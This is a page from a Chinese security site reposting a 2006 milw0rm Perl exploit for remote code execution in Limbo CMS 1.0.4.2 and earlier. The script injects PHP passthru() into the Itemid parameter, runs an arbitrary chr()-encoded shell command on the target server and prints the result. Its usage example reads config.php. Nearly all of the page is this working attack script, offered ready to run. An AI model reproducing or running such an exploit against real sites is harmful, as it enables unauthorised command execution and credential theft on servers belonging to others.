首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit


http://www.gipsky.com/
#!/usr/bin/perl
##
## Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
## Bug Discovered by: Coloss / Epsilon (advance1[at]gmail.com) http://coded.altervista.org/limbophp.pl
## /str0ke (milw0rm.com)

use LWP::Simple;

$serv = $ARGV[0];
$path = $ARGV[1];
$command = $ARGV[2];
$cmd = "echo start_er;".
"$command;".
"echo end_er";

my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

sub usage
{
print "Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit /str0ke (milw0rm.com)";
print "Usage: $0 www.example.com /directory/ \"cat config.php\"\n";
print "sever - URL\n";
print "path - path to limbo\n";
print "command - command to execute\n";
exit ();
}

sub exploit
{
print qq(Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit\n/str0ke (milw0rm.com)\n\n);
$URL = sprintf("http://%s%sindex.php?option=frontpage&Itemid=passthru($byte)",$serv,$path);
my $content = get "$URL";
if ($content =~ m/start_er(.*?)end_er/ms) {
my $out = $1;
$out =~ s/^\s |\s $//gs;
if ($out) {
print "$out\n";
}
}
}

if (@ARGV != 3){&usage;}else{&exploit;}

[2006-03-01]
<< FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号